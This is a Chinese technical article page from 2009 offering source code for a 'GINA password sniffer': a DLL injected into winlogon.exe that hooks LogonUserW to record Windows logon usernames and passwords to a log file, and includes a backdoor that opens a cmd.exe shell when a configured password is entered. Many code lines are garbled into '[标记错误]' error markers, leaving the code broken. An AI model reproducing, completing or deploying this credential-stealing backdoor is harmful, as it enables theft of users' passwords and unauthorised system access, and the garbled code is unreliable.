阅读文章
GINA PassWord Sniffer(截取登陆密码)
栏目:技术文章 作者:东方标准 时间:2009-12-27 04:21:05
GINA PassWord Sniffer(截取登陆密码)
dll源码,编译后插入winlogon.exe进程即可记录登陆密码记录。
需要在相同目录保存一个ntuserlog.config的配置文件,如:
enable=1
cmdline=cmd.exe
password=Ghash
logfile=c:\windows\sysem32\userpwdlog.log
文件末尾的回车必不可少。若enable为1 则可以password获得一个shell。
用了HOOK的技术,HOOK的是LogonUserW。
//VC-DLL
#include <windows.h>
#include <stdio.h>
#include <time.h>
int backdoor;
char shell[1023],passwd[1023];
char logfile[1023];
FILE *fp;
char buf1[127],buf2[127];
char pwd[1023];
unsigned long LUW;
BOOL
WINAPI
MyLogonUserW (
LPWSTR lpszUsername,
LPWSTR lpszDomain,
LPWSTR lpszPassword,
DWORD dwLogonType,
DWORD dwLogonProvider,
PHANDLE phToken
){
[标记错误:_tzset];
[标记错误:_strtime];
[标记错误:_strdate];
fp=[标记错误:fopen];
[标记错误:fprintf];
[标记错误:fclose];
[标记错误:sprintf];
[标记错误:if]
WinE[标记错误:xec];
__asm{
pop edi
pop esi
pop ebx
jmp LUW
}
}
HINSTANCE hInstance;
int WINAPI DllMain (HINSTANCE hInst, DWORD fdwReason, PVOID pvReserved)
{ unsigned char m;
unsigned long i,t,s;
LUW=(unsigned long)LogonUserW;
LUW+=5;
fp=[标记错误:fopen];
[标记错误:fscanf];
[标记错误:fscanf];
[标记错误:fscanf];
[标记错误:fscanf];
[标记错误:fclose];
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
hInstance=hInst;
m=0xe9;
s=(unsigned long)LogonUserW;
t=(unsigned long)MyLogonUserW-s-5;
WriteProcessM[标记错误:emory]s,&m,1,&i);
s++;
WriteProcessM[标记错误:emory]s,&t,4,&i);
break;
};
return TRUE;
}